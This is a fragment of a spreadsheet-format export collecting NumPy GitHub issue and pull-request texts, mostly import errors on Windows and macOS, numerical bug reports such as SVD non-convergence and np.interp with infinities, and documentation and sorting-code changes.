&lt;&lt; your code here &gt;&gt;_x000D_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Can someone please help? I am new to using keras and tensorflow. I am using it for a class I am taking this semester. _x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I had a problem when installing numpy. My laptop has 64 bit window 7. After installing python 2.7.13, I need to install numpy package. I set the path in Advanced system setting. _x000D_
![image](https://user-images.githubusercontent.com/47300457/52881387-b5513700-3164-11e9-9698-5c5b7c07bc4f.png)_x000D_
_x000D_
 Although numpy is successfully installed, my command "import numpy" in Python 2.7.13 Shell produces an error. _x000D_
### Reproducing code example:_x000D_
_x000D_
import numpy _x000D_
_x000D_
### Error message:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;pyshell#0&gt;", line 1, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "C:\Python27\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "C:\Python27\lib\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: _x000D_
```_x000D_
### Numpy/Python version information:_x000D_
Python 2.7.13 (v2.7.13:a06454b1afa1, Dec 17 2016, 20:53:40) [MSC v.1500 64 bit (AMD64)] on win32_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>errors installing numpy</t>
  </si>
  <si>
    <t xml:space="preserve">Relevant post on Stack Overflow: https://stackoverflow.com/questions/53303979/transpose-a-1-dimensional-array-in-numpy-without-casting-to-matrix_x000D_
</t>
  </si>
  <si>
    <t>DOC: Recommend adding dimension to switch between row and column vectors</t>
  </si>
  <si>
    <t>I posted this in Anaconda. But, later, feel that I should post it here because it is about numpy and it is suggested by the warning messages when I tried to uninstall numpy._x000D_
_x000D_
I try to run python 3.7 script in Eclipse/pydev ion win 7._x000D_
_x000D_
Wheh I imported numpy, i got error:_x000D_
_x000D_
```_x000D_
    import numpy.core.numeric as _nx_x000D_
    File "C:\My_Program\Anaconda3p7\Lib\site-packages\numpy\core\__init__.py", line 24, in &lt;module&gt;_x000D_
raise ImportError(msg)_x000D_
        ImportError: _x000D_
    Importing the multiarray numpy extension module failed.  Most likely you are trying to import a failed build of numpy._x000D_
     If you're working with a numpy git repo, try `git clean -xdf` (removes all_x000D_
files not under version control). Otherwise reinstall numpy._x000D_
```_x000D_
_x000D_
I installed Anaconda_x000D_
_x000D_
```_x000D_
 active environment : base_x000D_
active env location : C:\My_Program\Anaconda3p7_x000D_
    shell level : 1_x000D_
    user config file : C:\Users\aName\.condarc_x000D_
 ulated config files : C:\Users\aName\.condarc_x000D_
    conda version : 4.6.3_x000D_
  conda-build version : 3.17.8_x000D_
  python version : 3.6.8.final.0_x000D_
  base environment : C:\My_Program\Anaconda3p7  (writable)_x000D_
   channel URLs : https://conda.anaconda.org/anaconda-fusion/win-64_x000D_
                  https://conda.anaconda.org/anaconda-fusion/noarch_x000D_
                  https://repo.anaconda.com/pkgs/main/win-64_x000D_
                  https://repo.anaconda.com/pkgs/main/noarch_x000D_
                  https://repo.anaconda.com/pkgs/free/win-64_x000D_
                  https://repo.anaconda.com/pkgs/free/noarch_x000D_
                  https://repo.anaconda.com/pkgs/r/win-64_x000D_
                  https://repo.anaconda.com/pkgs/r/noarch_x000D_
                  https://repo.anaconda.com/pkgs/msys2/win-64_x000D_
                  https://repo.anaconda.com/pkgs/msys2/noarch_x000D_
  package cache : C:\ProgramData\Anaconda3p7\pkgs_x000D_
                  C:\Users\aName\.conda\pkgs_x000D_
                  C:\Users\aName\AppData\Local\conda\conda\pkgs_x000D_
  envs directories : C:\ProgramData\Anaconda3p7\envs_x000D_
                  C:\Users\aName\.conda\envs_x000D_
                  C:\Users\aName\AppData\Local\conda\conda\envs_x000D_
       platform : win-64_x000D_
     user-agent : conda/4.6.3 requests/2.21.0 CPython/3.6.8 Windows/7 Windows/6.1.7601_x000D_
  administrator : False_x000D_
     netrc file : None_x000D_
   offline mode : False_x000D_
```_x000D_
I have installed numpy 1.12.0 in Anaconda prompt._x000D_
_x000D_
If I imported numpy in Anaconda prompt, it works well._x000D_
_x000D_
But, if I import numpy in Eclipse/pydev, I got the above error._x000D_
_x000D_
If I import numpy in command-line but not in Anaconda prompt, I got error:_x000D_
_x000D_
```_x000D_
  &gt;&gt;&gt; import numpy_x000D_
  Traceback (most recent call last):_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
  from . import multiarray_x000D_
  ImportError: DLL load failed: The specified module could not be found._x000D_
_x000D_
  During handling of the above exception, another exception occurred:_x000D_
_x000D_
  Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
  from . import add_newdocs_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\add_newdocs.py", line 13, in &lt;module&gt;_x000D_
   from numpy.lib import add_newdoc_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\lib\__init__.py", line 8, in &lt;module&gt;_x000D_
  from .type_check import *_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\lib\type_check.py", line 11, in &lt;module&gt;_x000D_
  import numpy.core.numeric as _nx_x000D_
  File "C:\My_Program\Anaconda3p7\lib\site-packages\numpy\core\__init__.py", line 24, in &lt;module&gt;_x000D_
  raise ImportError(msg)_x000D_
 _x000D_
 ImportError:_x000D_
   Importing the multiarray numpy extension module failed.  Most likely you are trying to import a failed build of numpy._x000D_
   If you're working with a numpy git repo, try `git clean -xdf` (removes all files not under version control).  Otherwise reinstall numpy._x000D_
```_x000D_
I have tried most solutions online, but none of them work._x000D_
_x000D_
Could anyone help about this ?_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">numpy import error in Eclipse/PyDev on win 7 but it works in Anaconda prompt. </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</si>
  <si>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Closes #12834 </t>
  </si>
  <si>
    <t>ENH: Add 'offset' keyword to 'numpy.fromfile()'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
On Mac OS X Mojave,_x000D_
conda create -n numpy python=3.6 numpy=1.16_x000D_
source activate numpy_x000D_
python_x000D_
import numpy_x000D_
_x000D_
Produces run-time error complaining about libgfortran3 (see error message below)_x000D_
_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy_x000D_
(see error message, below)_x000D_
```_x000D_
_x000D_
_x000D_
### Error message:_x000D_
_x000D_
Original error was: dlopen(/Users/brodzik/miniconda3/envs/numpy/lib/python3.6/site-packages/numpy/core/_multiarray_umath.cpython-36m-darwin.so, 2): Library not loaded: @rpath/libgfortran.3.dylib_x000D_
  Referenced from: /Users/brodzik/miniconda3/envs/numpy/lib/libopenblas.dylib_x000D_
  Reason: image not found_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
I have installed gcc and gfortran with brew:_x000D_
_x000D_
gcc --version_x000D_
Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/Library/Developer/CommandLineTools/SDKs/MacOSX10.14.sdk/usr/include/c++/4.2.1_x000D_
Apple LLVM version 10.0.0 (clang-1000.10.44.4)_x000D_
Target: x86_64-apple-darwin18.2.0_x000D_
Thread model: posix_x000D_
InstalledDir: /Library/Developer/CommandLineTools/usr/bin_x000D_
(base) cu-vpn-nsidc-172:~ brodzik$ gfortran --version_x000D_
GNU Fortran (Homebrew GCC 8.2.0) 8.2.0_x000D_
Copyright (C) 2018 Free Software Foundation, Inc._x000D_
This is free software; see the source for copying conditions.  There is NO_x000D_
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE._x000D_
_x000D_
However, the above conda installation looks like it has installed libgfortran4, not 3:_x000D_
_x000D_
(numpy) cu-vpn-nsidc-172:~ brodzik$ conda list_x000D_
# packages in environment at /Users/brodzik/miniconda3/envs/numpy:_x000D_
#_x000D_
# Name                    Version                   Build  Channel_x000D_
blas                      1.1                    openblas    conda-forge/channel/main_x000D_
ca-certificates           2018.11.29           ha4d7672_0    conda-forge/channel/main_x000D_
certifi                   2018.11.29            py36_1000    conda-forge/channel/main_x000D_
libcxx                    7.0.0                h2d50403_2    conda-forge/channel/main_x000D_
libffi                    3.2.1             h0a44026_1005    conda-forge/channel/main_x000D_
libgfortran               4.0.0                         0    conda-forge/channel/main_x000D_
llvm-meta                 7.0.0                         0    conda-forge/channel/main_x000D_
ncurses                   6.1               h0a44026_1002    conda-forge/channel/main_x000D_
numpy                     1.16.1          py36_blas_openblash486cb9f_0  [blas_openblas]  conda-forge/channel/main_x000D_
openblas                  0.3.3             hdc02c5d_1001    conda-forge/channel/main_x000D_
openssl                   1.0.2p            h1de35cc_1002    conda-forge/channel/main_x000D_
pip                       19.0.2                   py36_0    conda-forge/channel/main_x000D_
python                    3.6.7             h4a56312_1001    conda-forge/channel/main_x000D_
readline                  7.0               hcfe32e1_1001    conda-forge/channel/main_x000D_
setuptools                40.8.0                   py36_0    conda-forge/channel/main_x000D_
sqlite                    3.26.0            h1765d9f_1000    conda-forge/channel/main_x000D_
tk                        8.6.9             ha441bb4_1000    conda-forge/channel/main_x000D_
wheel                     0.33.0                   py36_0    conda-forge/channel/main_x000D_
xz                        5.2.4             h1de35cc_1001    conda-forge/channel/main_x000D_
zlib                      1.2.11            h1de35cc_1004    conda-forge/channel/main_x000D_
(numpy) cu-vpn-nsidc-172:~ brodzik$ _x000D_
_x000D_
My conda version is 4.6.3._x000D_
_x000D_
I have tried to figure out how to install libgfortran3, but haven't had any luck. Please advise._x000D_
</t>
  </si>
  <si>
    <t>On Mac OS X, import numpy complaining about "Library not loaded: @rpath/libgfortran.3.dylib"</t>
  </si>
  <si>
    <t>This PR re-writes the sorting benchmarks to be more comprehensive._x000D_
_x000D_
Note that the new benchmarks will have to be run on all previous commits. Unfortunately I don't see a way around this._x000D_
_x000D_
Taken from @liwt31's sorting repo: https://github.com/liwt31/numpy-sort-benchmark_x000D_
_x000D_
@liwt31: Please let me know if this isn't okay, and I'll close the PR._x000D_
_x000D_
cc @charris</t>
  </si>
  <si>
    <t>BENCH: Re-write sorting benchmarks</t>
  </si>
  <si>
    <t>['03 - Maintenance', '28 - Benchmark', 'component: benchmarks']</t>
  </si>
  <si>
    <t xml:space="preserve">Without the newline and indent, the markup is not interpreted._x000D_
_x000D_
Note that in the see-also `np.lib.index_tricks.nd_grid` is reference but_x000D_
not linked as it appear to not be autogenerated, but this is another_x000D_
issue._x000D_
_x000D_
 Before/After screenshot_x000D_
_x000D_
![screen shot 2019-02-13 at 1 42 07 pm](https://user-images.githubusercontent.com/335567/52746863-65714500-2f97-11e9-8ec9-98e9bd760c7c.png)_x000D_
_x000D_
_x000D_
![screen shot 2019-02-13 at 1 54 59 pm](https://user-images.githubusercontent.com/335567/52746861-65714500-2f97-11e9-9a74-676039d01cfe.png)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Properly format Return section of ogrid Docstring,</t>
  </si>
  <si>
    <t>[ci skip]_x000D_
Fixes #11125. Related to #5822._x000D_
We allowed 0 for the scale factor long ago, but never reflected it in the documentation.</t>
  </si>
  <si>
    <t>DOC: Document that ``scale==0`` is now allowed in many distributions.</t>
  </si>
  <si>
    <t>DOC:  Grammatical fix in numpy doc</t>
  </si>
  <si>
    <t>Fixes #11172_x000D_
_x000D_
Adds an 'order' kwarg to packbits, unpackbits. Should this hit the mailing list? It is a small enhancement. I removed the separate handling of NPY_BYTE_ORDER, we only have little endian systems to test on, but it shouldn't matter for uint8 processing.</t>
  </si>
  <si>
    <t>ENH: Add 'bitorder' keyword to packbits, unpackbits</t>
  </si>
  <si>
    <t>Create fresh virtual env with Anaconda Navigator 1.9.6 under Windows 10, selecting Python 3.7, naming python37_x000D_
_x000D_
In the console of VSCode:_x000D_
- activate python37_x000D_
- pip install numpy_x000D_
```_x000D_
(python37) D:\TfsProj\alphastone&gt;pip install numpy_x000D_
Collecting numpy_x000D_
  Using cached https://files.pythonhosted.org/packages/41/b8/3a6b07352c2542ca1c89be7583e7ca07bf513895b6ac59ae008054f326b1/numpy-1.16.1-cp37-cp37m-win_amd64.whl_x000D_
Installing collected packages: numpy_x000D_
Successfully installed numpy-1.16.1_x000D_
```_x000D_
(same with parameter --no-cache-dir)_x000D_
- python_x000D_
- import numpy_x000D_
```_x000D_
(python37) D:\TfsProj\alphastone&gt;python_x000D_
Python 3.7.2 (default, Feb 11 2019, 14:11:50) [MSC v.1915 64 bit (AMD64)] :: Anaconda, Inc. on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Users\Name\.conda\envs\python37\lib\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "C:\Users\Name\.conda\envs\python37\lib\site-packages\numpy\core\multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "C:\Users\Name\.conda\envs\python37\lib\site-packages\numpy\core\overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: DLL load failed: Das angegebene Modul wurde nicht gefunden._x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\Users\Name\.conda\envs\python37\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "C:\Users\Name\.conda\envs\python37\lib\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
_x000D_
IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
```_x000D_
_x000D_
All advices, reinstallations via pip and conda, or different numpy versions (e.g. 1.15.4) didn't solve this issue for me._x000D_
_x000D_
If I do multiple pip uninstall numpy until there is no numpy left, and then do a conda install numpy, importing numpy interestingly works (in 1.15.4)._x000D_
_x000D_
A conda install numpy does the following:_x000D_
```_x000D_
The following NEW packages will be INSTALLED:_x000D_
_x000D_
  blas               pkgs/main/win-64::blas-1.0-mkl_x000D_
  icc_rt             pkgs/main/win-64::icc_rt-2019.0.0-h0cc432a_1_x000D_
  intel-openmp       pkgs/main/win-64::intel-openmp-2019.1-144_x000D_
  mkl                pkgs/main/win-64::mkl-2019.1-144_x000D_
  mkl_fft            pkgs/main/win-64::mkl_fft-1.0.10-py37h14836fe_0_x000D_
  mkl_random         pkgs/main/win-64::mkl_random-1.0.2-py37h343c172_0_x000D_
  numpy              pkgs/main/win-64::numpy-1.15.4-py37h19fb1c0_0_x000D_
  numpy-base         pkgs/main/win-64::numpy-base-1.15.4-py37hc3f5095_0_x000D_
```_x000D_
_x000D_
What's missing for the pip way?_x000D_
Any ideas?</t>
  </si>
  <si>
    <t>ImportError: DLL load failed for numpy 1.16.1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
In the Astropy documentation, https://github.com/astropy/astropy/blame/master/docs/development/docrules.rst#L558-L562 links to your https://github.com/numpy/numpy/blob/master/doc/HOWTO_BUILD_DOCS.rst.txt_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
The file is no longer there. What should we link it to now? Please advise. Thank you!_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python version is irrelevant. Numpy is the code in `master`._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HOWTO_BUILD_DOCS.rst.txt is missing from repo</t>
  </si>
  <si>
    <t>['04 - Documentation', '15 - Discussion']</t>
  </si>
  <si>
    <t xml:space="preserve">### Reproducing code example:_x000D_
I have outlined my issue on this stack overflow page. All my code is also available on this stack overlflow page (normally, i wouldn't link to an external page on a bug report, but i feel that it keeps my post here a bit cleaner): https://stackoverflow.com/questions/54637206/program-crashes-when-running-the-pyarray-max-command_x000D_
_x000D_
Whenever I run my code, it crashes without an error message. I am using the function correctly (according to the documentation). I'm not sure where to proceed from here._x000D_
_x000D_
Program output: _x000D_
_x000D_
`C:\Projects\Cpp_to_python_tests&gt;python numpy_test.py_x000D_
here_x000D_
_x000D_
C:\Projects\Cpp_to_python_tests&gt;`_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>running PyArray_Max crashes my boost code</t>
  </si>
  <si>
    <t>It would be great if `numpy.delete` supported `None` as `obj`._x000D_
In that case, the array is returned as is._x000D_
_x000D_
### Code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
x = [1, 2, 3, ]_x000D_
np.delete(x, None)_x000D_
# [1, 2, 3]_x000D_
```</t>
  </si>
  <si>
    <t>numpy.delete None</t>
  </si>
  <si>
    <t>['15 - Discussion', '23 - Wish List', '57 - Close?']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
related to #11439, yet my issue exist in 1.15.4, which is released after that merge. _x000D_
_x000D_
When the array contains infinity values, if -np.inf is present at the left or the np.inf is present at the right, in either `xp` or `fp`, their behavior are inconsistent. _x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
case1: infinity in the `fp`._x000D_
```python_x000D_
import numpy as np_x000D_
xp = np.array([0, 1, 9, 10])_x000D_
fp = np.array([-np.inf, 0.1, 0.9, np.inf])_x000D_
x = np.array([0.2, 9.5])_x000D_
_x000D_
np.interp(x, xp, fp) # returns array([nan, inf]), where array([-inf, inf]) is probably more appropriate. _x000D_
```_x000D_
case2: infinity in the `xp`._x000D_
```python_x000D_
import numpy as np_x000D_
xp = np.array([-np.inf, 1, 9, np.inf])_x000D_
fp = np.array([0, 0.1, 0.9, 1])_x000D_
x = np.array([0.2, 9.5])_x000D_
_x000D_
np.interp(x, xp, fp) # returns array([nan, 0.9])_x000D_
_x000D_
```_x000D_
the left side is giving nan, the right side is giving the value in `fp` that corresponds to non infinity value. I think it should be consistent for both sides, maybe like `array([0.1, 0.9])`, or `array([nan, nan])` (I am not sure which one is better). _x000D_
_x000D_
### Numpy/Python version information:_x000D_
`1.15.4`_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy.interp inconsistent behavior for left and right when inf is present.</t>
  </si>
  <si>
    <t>ndarray.max is missing in the document.</t>
  </si>
  <si>
    <t>DOC: ndarray.max is missing</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently attempting to uninstall numpy in a Python 2.7 ArcGIS environment, however I get the error cited in the error section of this issue._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```_x000D_
pip uninstall numpy_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
Cannot uninstall 'numpy'. It is a distutils installed project and thus we cannot accurately determine which files belong to it which would lead to only a partial uninstall._x000D_
&lt;!-- Full error message, if any (starting from line Traceback: ...) --&gt;_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
('1.9.3', '2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]')_x000D_
</t>
  </si>
  <si>
    <t>Cannot uninstall 'numpy'. It is a distutils installed project...</t>
  </si>
  <si>
    <t xml:space="preserve">In order to maintain forward compatibility it is necessary to keep the_x000D_
size of PyArray_ArrFuncs struct fixed. The usual trick of adding new_x000D_
elements to the end of the structure is not available in this case_x000D_
because the struct may be instanciated by user types and we have no way_x000D_
to know whether the new or old struct is in play._x000D_
_x000D_
The solution adopted here is the reuse the (a)mergesort slots for stable_x000D_
sorts of all kinds, with the actual kind set when the struct is_x000D_
initialized. The '(a)mergesort' option thus becomes an alias for_x000D_
'stable', but we keep it for backwards compatibility._x000D_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</si>
  <si>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Add timsort without breaking the API.</t>
  </si>
  <si>
    <t xml:space="preserve">The elements of arrays of unicode, string, and void type may have zero_x000D_
length and such types do not need sorting. This fixes a segfault in_x000D_
timsort due to integer division by zero by checking the element size and_x000D_
returning immediately when it is zero._x000D_
_x000D_
This is the first of three PRs dealing with timsort. The next will take care of the broken API compatibility, and the last will be a big coding style cleanup._x000D_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</si>
  <si>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Make timsort deal with zero length elements.</t>
  </si>
  <si>
    <t xml:space="preserve">When applying assert_array_equal on an (unequal) arrays with datetimes, an AttributeError is (incorrectly) raised in numpy 1.16.1._x000D_
_x000D_
In numpy 1.16.0, the behaviour was still correct, namely raising an AssertionError._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import datetime as dt_x000D_
a = np.array([dt.datetime(2000,1,1), dt.datetime(2000, 1, 2)])_x000D_
np.testing.assert_array_equal(a, a[::-1])_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Python36\lib\site-packages\IPython\core\interactiveshell.py", line 3267, in run_code_x000D_
    exec(code_obj, self.user_global_ns, self.user_ns)_x000D_
  File "&lt;ipython-input-27-fd47e00f876e&gt;", line 1, in &lt;module&gt;_x000D_
    np.testing.assert_array_equal(a, a[::-1])_x000D_
  File "C:\Python36\lib\site-packages\numpy\testing\_private\utils.py", line 896, in assert_array_equal_x000D_
    verbose=verbose, header='Arrays are not equal')_x000D_
  File "C:\Python36\lib\site-packages\numpy\testing\_private\utils.py", line 805, in assert_array_compare_x000D_
    + array2string(max_abs_error))_x000D_
  File "C:\Python36\lib\site-packages\numpy\core\arrayprint.py", line 687, in array2string_x000D_
    if a.size == 0:_x000D_
AttributeError: 'datetime.timedelta' object has no attribute 'size'_x000D_
_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.1 3.6.6 (v3.6.6:4cf1f54eb7, Jun 27 2018, 03:37:03) [MSC v.1900 64 bit (AMD64)]_x000D_
</t>
  </si>
  <si>
    <t>assert_array_equal raises AttributeError instead of AssertionError (regression)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I found and array on which numpy.linalg.svd fails. It is this one:_x000D_
[bad_array.zip](https://github.com/numpy/numpy/files/2837003/bad_array.zip)_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
from numpy.linalg import svd_x000D_
_x000D_
path = 'bad_array.npy'_x000D_
X = np.load(path)_x000D_
_x000D_
print(np.isnan(X).any())_x000D_
# False_x000D_
_x000D_
svd(X)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "test.py", line 10, in &lt;module&gt;_x000D_
    svd(X)_x000D_
  File "/home/hobber/.virtualenvs/tfg_env/lib/python3.6/site-packages/numpy/linalg/linalg.py", line 1612, in svd_x000D_
    u, s, vh = gufunc(a, signature=signature, extobj=extobj)_x000D_
  File "/home/hobber/.virtualenvs/tfg_env/lib/python3.6/site-packages/numpy/linalg/linalg.py", line 106, in _raise_linalgerror_svd_nonconvergence_x000D_
    raise LinAlgError("SVD did not converge")_x000D_
numpy.linalg.LinAlgError: SVD did not converge_x000D_
```_x000D_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It might be an issue on OpenBlas. See scipy/scipy#9620_x000D_
```_x000D_
&gt;&gt;&gt; numpy.show_config()_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
blas_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
```_x000D_
I don't know how to see the OpenBlas version, but as it is NumPy 1.16.1, it is expected to be `OpenBLAS v0.3.4+`. It was supposed to be fixed with this release, but here it is again._x000D_
_x000D_
Scipy version of svd doesn't fail, maybe because it is stil using an older version of OpenBlas_x000D_
```_x000D_
&gt;&gt;&gt; scipy.__version___x000D_
'1.2.0'_x000D_
```_x000D_
Everything is installed from PyPI, with pip_x000D_
```_x000D_
$ sudo lshw | grep -i cpu_x000D_
     *-cpu                  _x000D_
          description: CPU_x000D_
          product: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz_x000D_
          bus info: cpu@0_x000D_
          version: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz_x000D_
          capabilities: x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp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pti ssbd ibrs ibpb stibp tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid mpx rdseed adx smap clflushopt intel_pt xsaveopt xsavec xgetbv1 xsaves dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp flush_l1d cpufreq_x000D_
```_x000D_
With `OMP_NUM_THREADS=1` it doesn't fail._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
NumPy version: '1.16.1'_x000D_
Python version: 3.6.7 (default, Oct 22 2018, 11:32:17) _x000D_
[GCC 8.2.0]_x000D_
</t>
  </si>
  <si>
    <t>numpy.linalg.svd did not converge with normal ndarray</t>
  </si>
  <si>
    <t>Fixes #12927._x000D_
_x000D_
I'll leave a deceptively short explanation for now -- this patches to restore the **in-place** floor division behavior change described in the above issue. Regular floor division for those operand types is allowed and already enforced by our unit tests._x000D_
_x000D_
I don't know how much thought has been put it in to the possible effects of augmented assignment operations like `//=` enforcing unexpected constraints on the output data type or if these warrant some kind of `ifloordiv` Ufunc registration / type resolution adjustments.</t>
  </si>
  <si>
    <t>WIP, MAINT: restore int64 //= unit64 behavior</t>
  </si>
  <si>
    <t>['06 - Regression', '25 - WIP', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>On MacOS 10.6 importing latest numpy results in this error:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: dlopen(/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so, 2): Symbol not found: __tlv_bootstrap_x000D_
  Referenced from: /Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/../.dylibs/libopenblasp-r0.3.5.dev.dylib_x000D_
  Expected in: /usr/lib/libSystem.B.dylib_x000D_
 in /Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/../.dylibs/libopenblasp-r0.3.5.dev.dylib_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/Users/artcs/Library/Python/3.7/lib/python/site-packages/numpy/core/__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: _x000D_
_x000D_
